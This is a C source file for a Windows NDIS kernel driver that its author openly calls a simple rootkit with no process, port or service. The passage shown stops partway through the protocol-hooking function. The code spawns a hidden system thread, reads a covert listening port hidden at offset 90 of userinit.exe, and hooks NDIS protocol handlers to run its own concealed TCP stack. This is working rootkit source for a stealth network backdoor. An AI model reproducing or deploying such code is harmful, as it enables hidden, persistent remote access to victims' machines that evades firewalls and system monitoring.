ndishook.c

一个驱动上实现 无进程 无端口 无服务的简单rootkit

///
//	uty@uaty
///
#include <ndis.h>
#include "dummyprotocolfunc.h"
#include "structs.h"

typedef
struct _SIGNANDPORT{
	unsigned int sign;
	unsigned int port;
}SIGNANDPORT,*PSIGNANDPORT;

//not used
/*
typedef
struct _SYNACKPACKET{
	ULONG	sign;
	ULONG	BufferAddress;
}SYNACKPACKET,*PSYNACKPACKET;
*/
//
typedef struct _OSVERSIONINFOEXW {
    ULONG dwOSVersionInfoSize;
    ULONG dwMajorVersion;
    ULONG dwMinorVersion;
    ULONG dwBuildNumber;
    ULONG dwPlatformId;
    WCHAR  szCSDVersion[ 128 ];     // Maintenance string for PSS usage
    USHORT wServicePackMajor;
    USHORT wServicePackMinor;
    USHORT wSuiteMask;
    UCHAR wProductType;
    UCHAR wReserved;
} OSVERSIONINFOEXW, *POSVERSIONINFOEXW, *LPOSVERSIONINFOEXW, RTL_OSVERSIONINFOEXW, *PRTL_OSVERSIONINFOEXW;

typedef struct _OSVERSIONINFOW {
    ULONG dwOSVersionInfoSize;
    ULONG dwMajorVersion;
    ULONG dwMinorVersion;
    ULONG dwBuildNumber;
    ULONG dwPlatformId;
    WCHAR  szCSDVersion[ 128 ];     // Maintenance string for PSS usage
} OSVERSIONINFOW, *POSVERSIONINFOW, *LPOSVERSIONINFOW, RTL_OSVERSIONINFOW, *PRTL_OSVERSIONINFOW;

//--------------------------------------------------------------------
///mAcros
//#define	OURPORT	9929
#define MAX_PATH	260
//--------------------------------------------------------------------
////globAl vAr
HOOK_CONTEXT_STRUCT *m_pOurAllOfHookContext = NULL;
NDIS_HANDLE		m_ourPAcketPoolHAndle	= NULL;
NDIS_HANDLE		m_ourBufferPoolHAndle	= NULL;
//for ProtocolReceive
PNDIS_PACKET	m_ourPAcketHAndle		= NULL;
PNDIS_BUFFER	m_ourBufferHAndle		= NULL;
PVOID			m_ourBuffer				= NULL;
//
PKEVENT			g_puSendEvent;
PLARGE_INTEGER	g_pTimeOut;
ULONG			OURPORT;
//--------------------------------------------------------------------
//defined in ubd_sys.c
extern	TCPS_Connection		g_ConnectionSpAce[MAX_CONNECTIONS];
extern	RECVLISTHEAD		g_RecvListHeAd;
extern	SENDLISTHEAD		g_SendListHeAd;
//
//NDIS_HANDLE		g_pBindAdaptHandle;
//--------------------------------------------------------------------
////proto function
NTSTATUS
RtlGetVersion(
	PRTL_OSVERSIONINFOW  lpVersionInformation
	);
/////////
VOID
OnUnloAd( 
	IN PDRIVER_OBJECT DriverObject
	);

VOID
HookFuncBlock(
	CHAR* ProtocolContent
	);

HOOK_CONTEXT_STRUCT*
HookNdisFunc(
	PVOID pHookProc,
	PVOID *ppOrigProc,
	PVOID pBindAdAptHAndle,
	PVOID pProtocolContent
	);

HOOK_CONTEXT_STRUCT*
IsHookedNdisFunc(
	PVOID pAddr
	);

HOOK_CONTEXT_STRUCT*
IsHookedNdisFuncEx(
	PVOID	*pAddr
	);

ULONG
HookProtocol(
	VOID
	);

NDIS_STATUS	
HookProtocolReceive(
	IN	HOOK_CONTEXT_STRUCT	*pOurContext,
	IN	NDIS_HANDLE			ProtocolBindingContext,
	IN	NDIS_HANDLE			MAcReceiveContext,
	IN	PVOID				HeAderBuffer,
	IN	UINT				HeAderBufferSize,
	IN	PVOID				LookAheAdBuffer,
	IN	UINT				LookAheAdBufferSize,
	IN	UINT				PAcketSize
	);

INT
HookProtocolReceivePAcket(
	IN	HOOK_CONTEXT_STRUCT	*pOurContext,
	IN	NDIS_HANDLE			ProtocolBindingContext,
	IN	PNDIS_PACKET		PAcket
	);

VOID
ReAdPAcket(
	PNDIS_PACKET	PAcket,
	PVOID			pBuffer,
	ULONG			ulBufSize
	);

ULONG
HAndlePAcket(
	HOOK_CONTEXT_STRUCT		*pOurContext,
	PNDIS_PACKET			pPAcket
	);

ULONG
HAndleBuffer(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID				pBuffer,
	ULONG				PAcketSize
	);

VOID
HookProtocolSendComplete(
	IN	HOOK_CONTEXT_STRUCT *pOurContext,
	IN	NDIS_HANDLE		ProtocolBindingContext,
	IN	PNDIS_PACKET	PAcket,
	IN	NDIS_STATUS		StAtus
	);

USHORT
checksum(
	USHORT	*buff,
	ULONG	size
	);

NTSTATUS 
SendSYNACKPAcket(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID pBuffer
	);

NTSTATUS
SendACKPAcket(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID				pBuffer
	);

NTSTATUS
GetPAcketDAtA(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID pBuffer
	);

NTSTATUS
SendACKPAcketToSendList(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID pBuffer
	);

NTSTATUS
SendSYNACKPAcketToSendList(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID pBuffer
	);

ULONG 
HAndleReceivePAcket(
	HOOK_CONTEXT_STRUCT *pOurContext,
	ULONG TotAlPAcketSize,
	PVOID pHeAdBuffer,
	ULONG ulHeadSize,
	PNDIS_PACKET pPAcket
	);

NTSTATUS
TCPS_StArtup(
	PDEVICE_OBJECT pDeviceObject
	);

NTSTATUS
AddRecvDAtAToList(
	PRECVLISTHEAD pRecvListHeAd,
	char*	dAtA,
	ULONG	RecvDAtALength,
	PTCPS_Connection pConnection
	);

PRECVLIST
RemoveRecvDAtAFromList(
	PRECVLISTHEAD pRecvListHeAd
	);

ULONG
SetConnection(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID				pBuffer
	);

NTSTATUS
UpDAteConnection(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID pBuffer
	);

VOID
RemoveSendDAtAFromList(
	PSENDLISTHEAD pSendListHeAd
	);

NTSTATUS
Disconnect(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID pBuffer
	);

NTSTATUS
SendDisconnectMessAgeToSendlist(
		HOOK_CONTEXT_STRUCT *pOurContext,
		PVOID pBuffer
		);

NTSTATUS
AddSendDAtAToList(
	PSENDLISTHEAD		pSendListHeAd,
	CHAR*				dAtA,
	ULONG				SendDAtALength,
	PTCPS_Connection	pConnection
	);

NTSTATUS
AddSendDAtAToListAtFront(
	PSENDLISTHEAD		pSendListHeAd,
	CHAR*				dAtA,
	ULONG				SendDAtALength,
	PTCPS_Connection	pConnection
	);

NTSTATUS
UpDAteConnectionSYN(
	HOOK_CONTEXT_STRUCT *pOurContext,
	PVOID pBuffer
	);

USHORT
CountChecksum(
	PVOID		pBuffer
	);

ULONG
GetTheListeningPort(
	VOID
	);

VOID
InitWorkThreAd(
	PVOID	pContext
	);

//--------------------------------------------------------------------
VOID OnUnloAd( IN PDRIVER_OBJECT DriverObject )
{
	//DbgPrint("My Driver UnloAded!\n");
}
//--------------------------------------------------------------------
NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{

	NTSTATUS	stAtus;
	HANDLE		hThreAd;
	

	DbgPrint("Driver begin!\n");

	DriverObject->DriverUnload = OnUnloAd;

	stAtus = PsCreateSystemThread(&hThreAd,
									(ACCESS_MASK)0,
									NULL,
									(HANDLE)0,
									NULL,
									InitWorkThreAd,
									DriverObject
									);
									
	if (!NT_SUCCESS(stAtus)){
		DbgPrint("error when creAte the threAd\n");
		return FALSE;
	}

	

	

	
	return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
VOID InitWorkThreAd(PVOID	pContext)
{
	PDEVICE_OBJECT		pDeviceObject;
	NTSTATUS			stAtus;
	WCHAR				deviceNAmeBuffer[] = L"\\Device\\uaty";//chAnge the nAme if hAve time
	UNICODE_STRING		deviceNAmeUnicodeString;
	//DriverObject->DriverUnload	= fuktdi_UnloAd;
	RtlInitUnicodeString(
		&deviceNAmeUnicodeString,
		deviceNAmeBuffer
		);

	stAtus = IoCreateDevice(
					pContext,
					0,//sizeof(DEVICE_EXTENSION),//do i hAve this?
					&deviceNAmeUnicodeString,
					FILE_DEVICE_UNKNOWN,//whAt's this
					0,
					TRUE,
					&pDeviceObject
					);


	//ndis initiAliztion
	g_puSendEvent	= ExAllocatePool(NonPagedPool,sizeof(KEVENT));
	g_pTimeOut		= ExAllocatePool(NonPagedPool,sizeof(LARGE_INTEGER));
	//g_pTimeOut->HighPart	= 0;
	g_pTimeOut->QuadPart	= -10000000;//i don't know how mush is better.now 1 seconds

	KeInitializeEvent(
		g_puSendEvent,
		SynchronizationEvent,
		FALSE
		);
	

	NdisAllocatePacketPool(&stAtus,&m_ourPAcketPoolHAndle,0xFFF,0x30);
	if(stAtus != NDIS_STATUS_SUCCESS){
		//DbgPrint("NdisAllocAtePAcketPool fAiled\n");
		goto InitWorkThreAd_end;
	}
	NdisAllocateBufferPool(&stAtus,&m_ourBufferPoolHAndle,0x30);
	if(stAtus != NDIS_STATUS_SUCCESS){
		//DbgPrint("NdisAllocAteBufferPool fAiled\n");
		goto InitWorkThreAd_end;
	}
	NdisAllocateMemoryWithTag(&m_ourBuffer,MAX_PACKET_SIZE,'ytaU');
	if(stAtus != NDIS_STATUS_SUCCESS){
		//DbgPrint("NdisAllocAteMemoryWithTAg fAiled\n");
		goto InitWorkThreAd_end;
	}
	NdisAllocateBuffer(&stAtus,&m_ourBufferHAndle,m_ourBufferHAndle,m_ourBuffer,MAX_PACKET_SIZE);
	if(stAtus != NDIS_STATUS_SUCCESS){
		//DbgPrint("NdisAllocAteBuffer fAiled\n");
		goto InitWorkThreAd_end;
	}
	NdisAllocatePacket(&stAtus,&m_ourPAcketHAndle,m_ourPAcketPoolHAndle);
	if(stAtus != NDIS_STATUS_SUCCESS){
		//DbgPrint("NdisAllocAtePAcket fAiled\n");
		goto InitWorkThreAd_end;
	}
	NdisChainBufferAtFront(m_ourPAcketHAndle,m_ourBufferHAndle);

	//get the listing port for userinit.exe 90 bytes to the front
	OURPORT = GetTheListeningPort();

	//
	TCPS_StArtup(pDeviceObject);

	//hook ndis
	HookProtocol();

InitWorkThreAd_end:
	PsTerminateSystemThread(STATUS_SUCCESS);
	DbgPrint("Never be here \n");

}
//--------------------------------------------------------------------
ULONG	GetTheListeningPort(VOID)
{
	RTL_OSVERSIONINFOEXW	osversion = {0};
	UNICODE_STRING			pAth;
	SIGNANDPORT				SignAndPort;
	OBJECT_ATTRIBUTES		oA;
	HANDLE					hFile;
	NTSTATUS				stAtus;
	IO_STATUS_BLOCK			IoStAtusBlock;
	LARGE_INTEGER			ByteOffset;

	osversion.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOEXW);
	RtlGetVersion((RTL_OSVERSIONINFOW*)&osversion);
	if(osversion.dwMajorVersion == 4){
		RtlInitUnicodeString(&pAth,L"\\??\\C:\\WINNT\\System32\\userinit.exe");
	}
	else if(osversion.dwMajorVersion == 5){
		if(osversion.dwMinorVersion >= 1){
			RtlInitUnicodeString(&pAth,L"\\??\\C:\\WINDOWS\\System32\\userinit.exe");
		}
		else{
			RtlInitUnicodeString(&pAth,L"\\??\\C:\\WINNT\\System32\\userinit.exe");
		}
	}
	else{
		//DbgPrint("1 listening on port 9929\n");
		return 9929;
	}

	InitializeObjectAttributes(
		&oA,
		&pAth,
		OBJ_CASE_INSENSITIVE,
		NULL,
		NULL
		);

	stAtus = ZwOpenFile(
				&hFile,
				GENERIC_READ,
				&oA,
				&IoStAtusBlock,
				FILE_SHARE_READ,
				FILE_NON_DIRECTORY_FILE
				);


	ByteOffset.HighPart = 0;
	ByteOffset.LowPart	= 90;//when instAll,i wrote it there
	stAtus = ZwReadFile(
				hFile,
				NULL,
				NULL,
				NULL,
				&IoStAtusBlock,
				&SignAndPort,
				sizeof(SIGNANDPORT),
				&ByteOffset,
				NULL
				);
	ZwClose(hFile);

	if(IoStAtusBlock.Status != STATUS_SUCCESS){
		//DbgPrint("2 listening on port 9929\n");
		return 9929;
	}

	DbgPrint("listening on port %d\n",SignAndPort.port);
	if(SignAndPort.sign == 0xAABBCCDD){
		return SignAndPort.port;
	}else{
		return 9929;
	}
}
//--------------------------------------------------------------------
ULONG	HookProtocol(VOID)
{
	NDIS_PROTOCOL_CHARACTERISTICS	ourNPC;
	NDIS_STRING	protoNAme = NDIS_STRING_CONST("HdFw_Slot");
	NDIS_STATUS	StAtus;
	NDIS_HANDLE	ourProtocolHAndle = NULL;
	CHAR*	ProtocolChAin;
	ULONG	offset;
	ULONG	len;